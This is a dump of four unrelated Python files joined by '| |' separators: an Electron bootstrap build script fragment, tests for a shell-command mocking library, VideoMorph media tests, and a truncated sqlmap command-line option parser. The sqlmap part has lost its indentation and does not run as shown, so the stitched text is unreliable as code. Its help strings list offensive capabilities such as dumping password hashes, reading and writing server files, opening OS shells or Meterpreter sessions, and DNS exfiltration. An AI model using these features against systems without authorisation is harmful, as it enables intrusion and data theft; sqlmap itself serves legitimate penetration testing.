      execute_stdout(args, env)
def update_electron_modules(dirname, target_arch):
  """npm-install *dirname* against electron's node headers and ABI."""
  env = os.environ.copy()
  env['npm_config_arch'] = target_arch
  env['npm_config_target'] = get_atom_shell_version()
  env['npm_config_disturl'] = 'https://atom.io/download/atom-shell'
  update_node_modules(dirname, env)
def update_win32_python():
  """Clone Chromium's python_26 checkout into vendor/ (cygwin only)."""
  with scoped_cwd(VENDOR_DIR):
    if not os.path.exists('python_26'):
      execute_stdout(['git', 'clone', PYTHON_26_URL])
def build_libchromiumcontent(verbose, target_arch, defines):
  """Invoke script/build-libchromiumcontent.py with the given options."""
  script = os.path.join(SOURCE_ROOT, 'script', 'build-libchromiumcontent.py')
  args = [script]
  if verbose:
    args.append('-v')
  if defines:
    args.extend(['--defines', defines])
  args.extend(['--target_arch', target_arch])
  execute_stdout(args)
def update_clang():
  """Download/refresh the prebuilt clang toolchain (non-Windows only)."""
  execute_stdout([os.path.join(SOURCE_ROOT, 'script', 'update-clang.sh')])
def download_sysroot(target_arch):
  """Fetch the Linux sysroot for *target_arch*.

  install-sysroot.py expects Debian architecture names, so the Chromium
  names ia32/x64 are translated first.
  """
  debian_arch = {'ia32': 'i386', 'x64': 'amd64'}.get(target_arch, target_arch)
  execute_stdout([sys.executable,
                  os.path.join(SOURCE_ROOT, 'script', 'install-sysroot.py'),
                  '--arch', debian_arch])
def create_chrome_version_h():
  """Generate atom/common/chrome_version.h from libchromiumcontent's VERSION.

  The target is rewritten only when its content actually differs, so builds
  that depend on the header are not invalidated needlessly. Carriage returns
  are stripped before comparing so CRLF and LF checkouts compare equal.
  """
  version_file = os.path.join(SOURCE_ROOT, 'vendor', 'brightray', 'vendor',
                              'libchromiumcontent', 'VERSION')
  target_file = os.path.join(SOURCE_ROOT, 'atom', 'common', 'chrome_version.h')
  template_file = os.path.join(SOURCE_ROOT, 'script', 'chrome_version.h.in')

  with open(version_file, 'r') as f:
    version = f.read()
  with open(template_file, 'r') as f:
    template = f.read()

  content = template.replace('{PLACEHOLDER}', version.strip())

  # We update the file only if the content has changed (ignoring line ending
  # differences). Bug fix: strip '\r' (carriage returns), not the letter 'r',
  # which corrupted both sides of the comparison.
  should_write = True
  if os.path.isfile(target_file):
    with open(target_file, 'r') as f:
      should_write = f.read().replace('\r', '') != content.replace('\r', '')
  if should_write:
    with open(target_file, 'w') as f:
      f.write(content)
def touch_config_gypi():
  """Ensure vendor/node/config.gypi exists with the stub contents.

  Bug fix: the previous implementation opened the file with 'w+', which
  truncates it *before* the read, so the comparison always saw an empty file
  and the stub was rewritten (and the mtime bumped) on every run. Read the
  existing file first and only write when the content differs.
  """
  config_gypi = os.path.join(SOURCE_ROOT, 'vendor', 'node', 'config.gypi')
  content = "\n{'variables':{}}"
  should_write = True
  if os.path.isfile(config_gypi):
    with open(config_gypi, 'r') as f:
      should_write = f.read() != content
  if should_write:
    with open(config_gypi, 'w') as f:
      f.write(content)
def run_update(defines, disable_clang, clang_dir):
  """Run script/update.py with the accumulated GYP defines."""
  env = os.environ.copy()
  if not disable_clang and clang_dir == '':
    # Build with prebuilt clang.
    set_clang_env(env)

  update = os.path.join(SOURCE_ROOT, 'script', 'update.py')
  execute_stdout([sys.executable, update, '--defines', defines], env)
# Script entry point: propagate main()'s return value as the exit status.
if __name__ == '__main__':
  sys.exit(main())
| |
from __future__ import print_function, absolute_import, unicode_literals, division
import six
import subprocess
import unittest2
from mock import patch
from shmock import ShellCommandMock
def call(args):
    """Run *args* as a subprocess and return (stdout, stderr, exit_code)."""
    proc = subprocess.Popen(args,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = proc.communicate()
    return out, err, proc.returncode
class ShmockTest(unittest2.TestCase):
    """Integration tests for ShellCommandMock.

    Each test installs a set of mocked shell commands, invokes them through
    a real subprocess, and verifies stdout, stderr and the exit code.
    """

    def _assert_call(self, args, out=b"", err=b"", code=0):
        # Shared check: run the command and compare all three results.
        actual_out, actual_err, actual_code = call(args)
        self.assertEqual(actual_out, out)
        self.assertEqual(actual_err, err)
        self.assertEqual(actual_code, code)

    def test_empty_config(self):
        with ShellCommandMock({}):
            pass

    def test_string_config(self):
        """Regardless of parameters, saynay must always do the same thing"""
        with ShellCommandMock({'saynay': 'Nay sayers say nay.'}):
            for extra_args in ([], ['foo'], ['foo', '--bar']):
                self._assert_call(['saynay'] + extra_args,
                                  out=b"Nay sayers say nay.\n")

    def test_replace_existing_commands(self):
        """Mocked commands must replace existing commands"""
        mocks = {
            'grep': 'I am fake',
            'bash': 'I am fake',
            'id': 'I am fake'}
        with ShellCommandMock(mocks):
            for command in ('grep', 'bash', 'id'):
                self._assert_call([command], out=b"I am fake\n")

    def test_dont_replace_unmocked_commands(self):
        """commands that were not mocked must remain unchanged"""
        with ShellCommandMock({'foo': 'bar'}):
            # `true` succeeds silently ...
            self._assert_call(['true'])
            # ... while `false` must still fail with a non-zero exit code.
            out, err, code = call(['false'])
            self.assertEqual(out, b"")
            self.assertEqual(err, b"")
            self.assertNotEqual(code, 0)

    def test_no_params(self):
        """Mocking no params must work"""
        mocks = {'foo': {(): "I have no parameters"}}
        with ShellCommandMock(mocks):
            self._assert_call(['foo'], out=b"I have no parameters\n")

    def test_string_params(self):
        """Mock params provided as strings must work"""
        mocks = {
            'foo': {
                'param1': 'foo',
                'param2': 'bar',
            }
        }
        with ShellCommandMock(mocks):
            self._assert_call(['foo', 'param1'], out=b"foo\n")
            self._assert_call(['foo', 'param2'], out=b"bar\n")
            # An unmocked parameter must produce an error on every channel.
            out, err, code = call(['foo', 'param3'])
            self.assertNotEqual(out, b"")
            self.assertNotEqual(err, b"")
            self.assertNotEqual(code, 0)

    def test_tuple_params(self):
        """Mock params provided as tuples must work"""
        mocks = {
            'foo': {
                ('param1', 'x'): 'foo',
                ('param2', 'y'): 'bar',
            }
        }
        with ShellCommandMock(mocks):
            self._assert_call(['foo', 'param1', 'x'], out=b"foo\n")
            self._assert_call(['foo', 'param2', 'y'], out=b"bar\n")
            # An unmocked parameter tuple must produce an error.
            out, err, code = call(['foo', 'param3', 'z'])
            self.assertNotEqual(out, b"")
            self.assertNotEqual(err, b"")
            self.assertNotEqual(code, 0)

    def test_partial_dict_behavior(self):
        """Behavior specified as dict must apply defaults when incomplete"""
        mocks = {
            'foo': {'x': {'stdout': "xxx"}},
            'bar': {'y': {'stderr': "yyy"}},
            'batz': {'z': {'returncode': 42}}
        }
        with ShellCommandMock(mocks):
            self._assert_call(['foo', 'x'], out=b"xxx\n")
            self._assert_call(['bar', 'y'], err=b"yyy\n")
            self._assert_call(['batz', 'z'], code=42)

    def test_full_dict_behavior(self):
        """Behavior completely specified as dict must work"""
        mocks = {
            'foo': {'x': {'stdout': "xxx", 'stderr': "yyy", 'returncode': 42}}}
        with ShellCommandMock(mocks):
            self._assert_call(['foo', 'x'], out=b"xxx\n", err=b"yyy\n",
                              code=42)

    def test_default_behavior(self):
        """Behavior for None must become the default"""
        mocks = {
            'foo': {
                'x': "hello world",
                None: "default"
            }
        }
        with ShellCommandMock(mocks):
            self._assert_call(['foo', 'x'], out=b"hello world\n")
            self._assert_call(['foo', 'what', 'ever'], out=b"default\n")
            self._assert_call(['foo'], out=b"default\n")

    @patch("six.moves.builtins.print")
    def test_keep_temp_dir(self, mock_print):
        """keep_temp_dir=True must preserve the mock files on disc
        Also, it must print the location of the temporary directory.
        """
        import os
        import shutil
        with ShellCommandMock({'foo': 'bar'}, keep_temp_dir=True) as shmocker:
            mock_dir = shmocker.temp_dir
        try:
            # The temp dir location must have been printed ...
            printed = "\n".join(args[0][0]
                                for args in mock_print.call_args_list)
            self.assertIn(mock_dir, printed)
            # ... and the mock script must still exist after the context.
            self.assertTrue(os.path.exists(os.path.join(mock_dir, 'foo')))
        finally:
            shutil.rmtree(mock_dir)
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name: test_media.py
#
# VideoMorph - A PyQt5 frontend to ffmpeg and avconv.
# Copyright 2015-2016 VideoMorph Development Team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides tests for media.py module."""
import nose
from videomorph.converter import media
from videomorph.converter import profiles
from videomorph.converter import XMLProfile
from videomorph.converter import ConversionLib
conv_lib = ConversionLib()
# Set of tests for media.MediaFile class
def test_get_name():
    """get_name must return the bare file name, optionally with extension."""
    media_file = _get_media_file_obj()
    nose.tools.assert_equal(media_file.get_name(), 'Dad')
    # Equivalent plain-assert spelling of the same check
    assert media_file.get_name() == 'Dad'
    # With the extension included
    assert media_file.get_name(with_extension=True) == 'Dad.mpg'
def test_get_info_with_ffprobe():
    """get_info must expose the format duration probed by ffprobe."""
    media_file = _get_media_file_obj()
    duration = float(media_file.get_info('format_duration'))
    nose.tools.assert_almost_equal(duration, 120.72)
    # Additional metadata checks, currently disabled:
    # nose.tools.assert_almost_equal(float(media_file.get_info('file_size')),
    #                                21227416.0)
    # nose.tools.assert_equal(media_file.get_info('format_name'), 'mpeg')
    # nose.tools.assert_equal(media_file.get_info('format_long_name'),
    #                         'MPEG-PS (MPEG-2 Program Stream)')
# def test_get_info_with_avprobe():
# media_file = _get_media_file_obj(prober='avprobe')
#
# nose.tools.assert_almost_equal(float(
# media_file.get_info('format_duration')),
# 120.68)
# nose.tools.assert_almost_equal(float(media_file.get_info('file_size')),
# 21227416.0)
# nose.tools.assert_equal(media_file.get_info('format_name'),
# 'mpeg')
# nose.tools.assert_equal(media_file.get_info('format_long_name'),
# 'MPEG-PS (MPEG-2 Program Stream)')
def test_get_conversion_cmd():
    """build_conversion_cmd must produce the full DVD conversion arg list."""
    expected = ['-i', 'Dad.mpg', '-f', 'dvd', '-target', 'ntsc-dvd',
                '-vcodec', 'mpeg2video', '-r', '29.97', '-s', '352x480',
                '-aspect', '4:3', '-b:v', '4000k', '-mbd', 'rd',
                '-cmp', '2', '-subcmp', '2', '-acodec', 'mp2',
                '-b:a', '192k', '-ar', '48000', '-ac', '2',
                '-threads', '3', '-y', './[DVDF]-Dad.mpg']
    cmd = _get_media_file_obj().build_conversion_cmd(
        output_dir='.',
        target_quality='DVD Fullscreen (4:3)')
    nose.tools.assert_equal(cmd, expected)
def test_profile():
    """conversion_profile must be a profiles._Profile instance."""
    profile = _get_media_file_obj().conversion_profile
    assert isinstance(profile, profiles._Profile)
# Set of tests for media.MediaList class
def test_add_file():
    """add_file must append the given MediaFile to an empty list."""
    new_file = _get_media_file_obj()
    target_list = _get_media_list_obj(empty=True)
    target_list.add_file(new_file)
    # Exactly one entry, and it is the very object we added.
    assert len(target_list) == 1
    assert isinstance(target_list[0], media.MediaFile)
    assert target_list[0] is new_file
@nose.tools.raises(media.InvalidMetadataError)
def test_add_file_invalid_metadata():
    """add_file must reject files with unusable duration metadata."""
    bad_file = _get_media_file_obj()
    target_list = _get_media_list_obj(empty=True)
    # A non-numeric duration must raise InvalidMetadataError ...
    bad_file.info['format_duration'] = 'wrong'
    target_list.add_file(bad_file)
    # ... as must a zero duration.
    bad_file.info['format_duration'] = 0
    target_list.add_file(bad_file)
def test_add_file_twice():
    """Adding the same file twice must keep only a single entry."""
    duplicate = _get_media_file_obj()
    target_list = _get_media_list_obj(empty=True)
    for _ in range(2):
        target_list.add_file(duplicate)
    assert target_list.length == 1
def test_clear():
    """clear must remove every file from the list."""
    populated_list = _get_media_list_obj()
    # Precondition: exactly one element present.
    nose.tools.assert_equal(len(populated_list), 1)
    populated_list.clear()
    nose.tools.assert_equal(len(populated_list), 0)
def test_delete_file():
    """delete_file must drop the entry at the given index."""
    populated_list = _get_media_list_obj()
    # Precondition: exactly one element present.
    assert len(populated_list) == 1
    populated_list.delete_file(file_index=0)
    assert len(populated_list) == 0
def test_get_file():
    """get_file must return the MediaFile stored at the given index."""
    media_list = _get_media_list_obj()
    fetched = media_list.get_file(file_index=0)
    assert isinstance(fetched, media.MediaFile)
    assert fetched is media_list[0]
def test_get_file_name():
    """File names must be retrievable via running_file and by index."""
    media_list = _get_media_list_obj()
    media_list.position = 0
    # Through the running file ...
    assert media_list.running_file.get_name() == 'Dad'
    assert media_list.running_file.get_name(with_extension=True) == 'Dad.mpg'
    # ... and through an explicit index.
    assert media_list.get_file_name(file_index=0) == 'Dad'
    assert media_list.get_file_name(
        file_index=0, with_extension=True) == 'Dad.mpg'
def test_get_file_path():
    """get_file_path must return the stored file path."""
    path = _get_media_list_obj().get_file_path(file_index=0)
    assert path == 'Dad.mpg'
def test_lenght():
    """The length property must reflect the number of files."""
    # NOTE: the function name keeps its historical misspelling so the
    # test stays discoverable under the same name.
    nose.tools.assert_equal(_get_media_list_obj().length, 1)
def test_duration():
    """duration must match the value probed by ffprobe."""
    total = _get_media_list_obj().duration
    nose.tools.assert_almost_equal(total, 120.72)
# Helper functions
def _get_media_file_obj(file_path='Dad.mpg'):
    """Helper: create a MediaFile using the DVD Fullscreen (4:3) profile."""
    xml_profile = XMLProfile()
    xml_profile.set_xml_root()
    profile = xml_profile.get_conversion_profile(
        profile_name='DVD',
        target_quality='DVD Fullscreen (4:3)',
        prober=conv_lib.prober)
    return media.MediaFile(file_path, conversion_profile=profile)
def _get_media_list_obj(empty=False):
    """Helper: create a MediaList, optionally pre-populated with one file."""
    result = media.MediaList()
    if empty:
        return result
    result.add_file(_get_media_file_obj())
    return result
# Run the whole suite through nose's test runner when executed directly.
if __name__ == '__main__':
    nose.main()
| |
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import re
import shlex
import sys
from optparse import OptionError
from optparse import OptionGroup
from optparse import OptionParser
from optparse import SUPPRESS_HELP
from lib.core.common import checkDeprecatedOptions
from lib.core.common import checkSystemEncoding
from lib.core.common import expandMnemonics
from lib.core.common import getUnicode
from lib.core.data import cmdLineOptions
from lib.core.data import conf
from lib.core.data import logger
from lib.core.defaults import defaults
from lib.core.enums import AUTOCOMPLETE_TYPE
from lib.core.exception import SqlmapShellQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.settings import BASIC_HELP_ITEMS
from lib.core.settings import DUMMY_URL
from lib.core.settings import IS_WIN
from lib.core.settings import MAX_HELP_OPTION_LENGTH
from lib.core.settings import VERSION_STRING
from lib.core.shell import autoCompletion
from lib.core.shell import clearHistory
from lib.core.shell import loadHistory
from lib.core.shell import saveHistory
def cmdLineParser(argv=None):
"""
This function parses the command line parameters and arguments
"""
if not argv:
argv = sys.argv
checkSystemEncoding()
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding())
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
"\"%s\"" % _ if " " in _ else _)
parser = OptionParser(usage=usage)
try:
parser.add_option("--hh", dest="advancedHelp",
action="store_true",
help="Show advanced help message and exit")
parser.add_option("--version", dest="showVersion",
action="store_true",
help="Show program's version number and exit")
parser.add_option("-v", dest="verbose", type="int",
help="Verbosity level: 0-6 (default %d)" % defaults.verbose)
# Target options
target = OptionGroup(parser, "Target", "At least one of these "
"options has to be provided to define the target(s)")
target.add_option("-d", dest="direct", help="Connection string "
"for direct database connection")
target.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")")
target.add_option("-l", dest="logFile", help="Parse target(s) from Burp "
"or WebScarab proxy log file")
target.add_option("-x", dest="sitemapUrl", help="Parse target(s) from remote sitemap(.xml) file")
target.add_option("-m", dest="bulkFile", help="Scan multiple targets given "
"in a textual file ")
target.add_option("-r", dest="requestFile",
help="Load HTTP request from a file")
target.add_option("-g", dest="googleDork",
help="Process Google dork results as target URLs")
target.add_option("-c", dest="configFile",
help="Load options from a configuration INI file")
# Request options
request = OptionGroup(parser, "Request", "These options can be used "
"to specify how to connect to the target URL")
request.add_option("--method", dest="method",
help="Force usage of given HTTP method (e.g. PUT)")
request.add_option("--data", dest="data",
help="Data string to be sent through POST")
request.add_option("--param-del", dest="paramDel",
help="Character used for splitting parameter values")
request.add_option("--cookie", dest="cookie",
help="HTTP Cookie header value")
request.add_option("--cookie-del", dest="cookieDel",
help="Character used for splitting cookie values")
request.add_option("--load-cookies", dest="loadCookies",
help="File containing cookies in Netscape/wget format")
request.add_option("--drop-set-cookie", dest="dropSetCookie",
action="store_true",
help="Ignore Set-Cookie header from response")
request.add_option("--user-agent", dest="agent",
help="HTTP User-Agent header value")
request.add_option("--random-agent", dest="randomAgent",
action="store_true",
help="Use randomly selected HTTP User-Agent header value")
request.add_option("--host", dest="host",
help="HTTP Host header value")
request.add_option("--referer", dest="referer",
help="HTTP Referer header value")
request.add_option("-H", "--header", dest="header",
help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")")
request.add_option("--headers", dest="headers",
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
request.add_option("--auth-type", dest="authType",
help="HTTP authentication type "
"(Basic, Digest, NTLM or PKI)")
request.add_option("--auth-cred", dest="authCred",
help="HTTP authentication credentials "
"(name:password)")
request.add_option("--auth-file", dest="authFile",
help="HTTP authentication PEM cert/private key file")
request.add_option("--ignore-401", dest="ignore401", action="store_true",
help="Ignore HTTP Error 401 (Unauthorized)")
request.add_option("--proxy", dest="proxy",
help="Use a proxy to connect to the target URL")
request.add_option("--proxy-cred", dest="proxyCred",
help="Proxy authentication credentials "
"(name:password)")
request.add_option("--proxy-file", dest="proxyFile",
help="Load proxy list from a file")
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
help="Ignore system default proxy settings")
request.add_option("--tor", dest="tor",
action="store_true",
help="Use Tor anonymity network")
request.add_option("--tor-port", dest="torPort",
help="Set Tor proxy port other than default")
request.add_option("--tor-type", dest="torType",
help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)")
request.add_option("--check-tor", dest="checkTor",
action="store_true",
help="Check to see if Tor is used properly")
request.add_option("--delay", dest="delay", type="float",
help="Delay in seconds between each HTTP request")
request.add_option("--timeout", dest="timeout", type="float",
help="Seconds to wait before timeout connection "
"(default %d)" % defaults.timeout)
request.add_option("--retries", dest="retries", type="int",
help="Retries when the connection timeouts "
"(default %d)" % defaults.retries)
request.add_option("--randomize", dest="rParam",
help="Randomly change value for given parameter(s)")
request.add_option("--safe-url", dest="safeUrl",
help="URL address to visit frequently during testing")
request.add_option("--safe-post", dest="safePost",
help="POST data to send to a safe URL")
request.add_option("--safe-req", dest="safeReqFile",
help="Load safe HTTP request from a file")
request.add_option("--safe-freq", dest="safeFreq", type="int",
help="Test requests between two visits to a given safe URL")
request.add_option("--skip-urlencode", dest="skipUrlEncode",
action="store_true",
help="Skip URL encoding of payload data")
request.add_option("--csrf-token", dest="csrfToken",
help="Parameter used to hold anti-CSRF token")
request.add_option("--csrf-url", dest="csrfUrl",
help="URL address to visit to extract anti-CSRF token")
request.add_option("--force-ssl", dest="forceSSL",
action="store_true",
help="Force usage of SSL/HTTPS")
request.add_option("--hpp", dest="hpp",
action="store_true",
help="Use HTTP parameter pollution method")
request.add_option("--eval", dest="evalCode",
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
# Optimization options
optimization = OptionGroup(parser, "Optimization", "These "
"options can be used to optimize the "
"performance of sqlmap")
optimization.add_option("-o", dest="optimize",
action="store_true",
help="Turn on all optimization switches")
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
help="Predict common queries output")
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
help="Use persistent HTTP(s) connections")
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
help="Retrieve page length without actual HTTP response body")
optimization.add_option("--threads", dest="threads", type="int",
help="Max number of concurrent HTTP(s) "
"requests (default %d)" % defaults.threads)
# Injection options
injection = OptionGroup(parser, "Injection", "These options can be "
"used to specify which parameters to test "
"for, provide custom injection payloads and "
"optional tampering scripts")
injection.add_option("-p", dest="testParameter",
help="Testable parameter(s)")
injection.add_option("--skip", dest="skip",
help="Skip testing for given parameter(s)")
injection.add_option("--skip-static", dest="skipStatic", action="store_true",
help="Skip testing parameters that not appear dynamic")
injection.add_option("--dbms", dest="dbms",
help="Force back-end DBMS to this value")
injection.add_option("--dbms-cred", dest="dbmsCred",
help="DBMS authentication credentials (user:password)")
injection.add_option("--os", dest="os",
help="Force back-end DBMS operating system "
"to this value")
injection.add_option("--invalid-bignum", dest="invalidBignum",
action="store_true",
help="Use big numbers for invalidating values")
injection.add_option("--invalid-logical", dest="invalidLogical",
action="store_true",
help="Use logical operations for invalidating values")
injection.add_option("--invalid-string", dest="invalidString",
action="store_true",
help="Use random strings for invalidating values")
injection.add_option("--no-cast", dest="noCast",
action="store_true",
help="Turn off payload casting mechanism")
injection.add_option("--no-escape", dest="noEscape",
action="store_true",
help="Turn off string escaping mechanism")
injection.add_option("--prefix", dest="prefix",
help="Injection payload prefix string")
injection.add_option("--suffix", dest="suffix",
help="Injection payload suffix string")
injection.add_option("--tamper", dest="tamper",
help="Use given script(s) for tampering injection data")
# Detection options
detection = OptionGroup(parser, "Detection", "These options can be "
"used to customize the detection phase")
detection.add_option("--level", dest="level", type="int",
help="Level of tests to perform (1-5, "
"default %d)" % defaults.level)
detection.add_option("--risk", dest="risk", type="int",
help="Risk of tests to perform (1-3, "
"default %d)" % defaults.level)
detection.add_option("--string", dest="string",
help="String to match when "
"query is evaluated to True")
detection.add_option("--not-string", dest="notString",
help="String to match when "
"query is evaluated to False")
detection.add_option("--regexp", dest="regexp",
help="Regexp to match when "
"query is evaluated to True")
detection.add_option("--code", dest="code", type="int",
help="HTTP code to match when "
"query is evaluated to True")
detection.add_option("--text-only", dest="textOnly",
action="store_true",
help="Compare pages based only on the textual content")
detection.add_option("--titles", dest="titles",
action="store_true",
help="Compare pages based only on their titles")
# Techniques options
techniques = OptionGroup(parser, "Techniques", "These options can be "
"used to tweak testing of specific SQL "
"injection techniques")
techniques.add_option("--technique", dest="tech",
help="SQL injection techniques to use "
"(default \"%s\")" % defaults.tech)
techniques.add_option("--time-sec", dest="timeSec",
type="int",
help="Seconds to delay the DBMS response "
"(default %d)" % defaults.timeSec)
techniques.add_option("--union-cols", dest="uCols",
help="Range of columns to test for UNION query SQL injection")
techniques.add_option("--union-char", dest="uChar",
help="Character to use for bruteforcing number of columns")
techniques.add_option("--union-from", dest="uFrom",
help="Table to use in FROM part of UNION query SQL injection")
techniques.add_option("--dns-domain", dest="dnsName",
help="Domain name used for DNS exfiltration attack")
techniques.add_option("--second-order", dest="secondOrder",
help="Resulting page URL searched for second-order "
"response")
# Fingerprint options
fingerprint = OptionGroup(parser, "Fingerprint")
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp",
action="store_true",
help="Perform an extensive DBMS version fingerprint")
# Enumeration options
enumeration = OptionGroup(parser, "Enumeration", "These options can "
"be used to enumerate the back-end database "
"management system information, structure "
"and data contained in the tables. Moreover "
"you can run your own SQL statements")
enumeration.add_option("-a", "--all", dest="getAll",
action="store_true", help="Retrieve everything")
enumeration.add_option("-b", "--banner", dest="getBanner",
action="store_true", help="Retrieve DBMS banner")
enumeration.add_option("--current-user", dest="getCurrentUser",
action="store_true",
help="Retrieve DBMS current user")
enumeration.add_option("--current-db", dest="getCurrentDb",
action="store_true",
help="Retrieve DBMS current database")
enumeration.add_option("--hostname", dest="getHostname",
action="store_true",
help="Retrieve DBMS server hostname")
enumeration.add_option("--is-dba", dest="isDba",
action="store_true",
help="Detect if the DBMS current user is DBA")
enumeration.add_option("--users", dest="getUsers", action="store_true",
help="Enumerate DBMS users")
enumeration.add_option("--passwords", dest="getPasswordHashes",
action="store_true",
help="Enumerate DBMS users password hashes")
enumeration.add_option("--privileges", dest="getPrivileges",
action="store_true",
help="Enumerate DBMS users privileges")
enumeration.add_option("--roles", dest="getRoles",
action="store_true",
help="Enumerate DBMS users roles")
enumeration.add_option("--dbs", dest="getDbs", action="store_true",
help="Enumerate DBMS databases")
enumeration.add_option("--tables", dest="getTables", action="store_true",
help="Enumerate DBMS database tables")
enumeration.add_option("--columns", dest="getColumns", action="store_true",
help="Enumerate DBMS database table columns")
enumeration.add_option("--schema", dest="getSchema", action="store_true",
help="Enumerate DBMS schema")
enumeration.add_option("--count", dest="getCount", action="store_true",
help="Retrieve number of entries for table(s)")
enumeration.add_option("--dump", dest="dumpTable", action="store_true",
help="Dump DBMS database table entries")
enumeration.add_option("--dump-all", dest="dumpAll", action="store_true",
help="Dump all DBMS databases tables entries")
enumeration.add_option("--search", dest="search", action="store_true",
help="Search column(s), table(s) and/or database name(s)")
enumeration.add_option("--comments", dest="getComments", action="store_true",
help="Retrieve DBMS comments")
enumeration.add_option("-D", dest="db",
help="DBMS database to enumerate")
enumeration.add_option("-T", dest="tbl",
help="DBMS database table(s) to enumerate")
enumeration.add_option("-C", dest="col",
help="DBMS database table column(s) to enumerate")
enumeration.add_option("-X", dest="excludeCol",
help="DBMS database table column(s) to not enumerate")
enumeration.add_option("-U", dest="user",
help="DBMS user to enumerate")
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs",
action="store_true",
help="Exclude DBMS system databases when "
"enumerating tables")
enumeration.add_option("--pivot-column", dest="pivotColumn",
help="Pivot column name")
enumeration.add_option("--where", dest="dumpWhere",
help="Use WHERE condition while table dumping")
enumeration.add_option("--start", dest="limitStart", type="int",
help="First query output entry to retrieve")
enumeration.add_option("--stop", dest="limitStop", type="int",
help="Last query output entry to retrieve")
enumeration.add_option("--first", dest="firstChar", type="int",
help="First query output word character to retrieve")
enumeration.add_option("--last", dest="lastChar", type="int",
help="Last query output word character to retrieve")
enumeration.add_option("--sql-query", dest="query",
help="SQL statement to be executed")
enumeration.add_option("--sql-shell", dest="sqlShell",
action="store_true",
help="Prompt for an interactive SQL shell")
enumeration.add_option("--sql-file", dest="sqlFile",
help="Execute SQL statements from given file(s)")
# Brute force options
brute = OptionGroup(parser, "Brute force", "These "
"options can be used to run brute force "
"checks")
brute.add_option("--common-tables", dest="commonTables", action="store_true",
help="Check existence of common tables")
brute.add_option("--common-columns", dest="commonColumns", action="store_true",
help="Check existence of common columns")
# User-defined function options
udf = OptionGroup(parser, "User-defined function injection", "These "
"options can be used to create custom user-defined "
"functions")
udf.add_option("--udf-inject", dest="udfInject", action="store_true",
help="Inject custom user-defined functions")
udf.add_option("--shared-lib", dest="shLib",
help="Local path of the shared library")
# File system options
filesystem = OptionGroup(parser, "File system access", "These options "
"can be used to access the back-end database "
"management system underlying file system")
filesystem.add_option("--file-read", dest="rFile",
help="Read a file from the back-end DBMS "
"file system")
filesystem.add_option("--file-write", dest="wFile",
help="Write a local file on the back-end "
"DBMS file system")
filesystem.add_option("--file-dest", dest="dFile",
help="Back-end DBMS absolute filepath to "
"write to")
# Takeover options
takeover = OptionGroup(parser, "Operating system access", "These "
"options can be used to access the back-end "
"database management system underlying "
"operating system")
takeover.add_option("--os-cmd", dest="osCmd",
help="Execute an operating system command")
takeover.add_option("--os-shell", dest="osShell",
action="store_true",
help="Prompt for an interactive operating "
"system shell")
takeover.add_option("--os-pwn", dest="osPwn",
action="store_true",
help="Prompt for an OOB shell, "
"Meterpreter or VNC")
takeover.add_option("--os-smbrelay", dest="osSmb",
action="store_true",
help="One click prompt for an OOB shell, "
"Meterpreter or VNC")
takeover.add_option("--os-bof", dest="osBof",
action="store_true",
help="Stored procedure buffer overflow "
"exploitation")
takeover.add_option("--priv-esc", dest="privEsc",
action="store_true",
help="Database process user privilege escalation")
takeover.add_option("--msf-path", dest="msfPath",
help="Local path where Metasploit Framework "
"is installed")
takeover.add_option("--tmp-path", dest="tmpPath",
help="Remote absolute path of temporary files "
"directory")
# Windows registry options
windows = OptionGroup(parser, "Windows registry access", "These "
"options can be used to access the back-end "
"database management system Windows "
"registry")
windows.add_option("--reg-read", dest="regRead",
action="store_true",
help="Read a Windows registry key value")
windows.add_option("--reg-add", dest="regAdd",
action="store_true",
help="Write a Windows registry key value data")
windows.add_option("--reg-del", dest="regDel",
action="store_true",
help="Delete a Windows registry key value")
windows.add_option("--reg-key", dest="regKey",
help="Windows registry key")
windows.add_option("--reg-value", dest="regVal",
help="Windows registry key value")
windows.add_option("--reg-data", dest="regData",
help="Windows registry key value data")
windows.add_option("--reg-type", dest="regType",
help="Windows registry key value type")
# General options
general = OptionGroup(parser, "General", "These options can be used "
"to set some general working parameters")
#general.add_option("-x", dest="xmlFile",
# help="Dump the data into an XML file")
general.add_option("-s", dest="sessionFile",
help="Load session from a stored (.sqlite) file")
general.add_option("-t", dest="trafficFile",
help="Log all HTTP traffic into a "
"textual file")
general.add_option("--batch", dest="batch",
action="store_true",
help="Never ask for user input, use the default behaviour")
general.add_option("--binary-fields", dest="binaryFields",
help="Result fields having binary values (e.g. \"digest\")")
general.add_option("--charset", dest="charset",
help="Force character encoding used for data retrieval")
general.add_option("--crawl", dest="crawlDepth", type="int",
help="Crawl the website starting from the target URL")
general.add_option("--crawl-exclude", dest="crawlExclude",
help="Regexp to exclude pages from crawling (e.g. \"logout\")")
general.add_option("--csv-del", dest="csvDel",
help="Delimiting character used in CSV output "
"(default \"%s\")" % defaults.csvDel)
general.add_option("--dump-format", dest="dumpFormat",
help="Format of dumped data (CSV (default), HTML or SQLITE)")
general.add_option("--eta", dest="eta",
action="store_true",
help="Display for each output the "
"estimated time of arrival")
general.add_option("--flush-session", dest="flushSession",
action="store_true",
help="Flush session files for current target")
general.add_option("--forms", dest="forms",
action="store_true",
help="Parse and test forms on target URL")
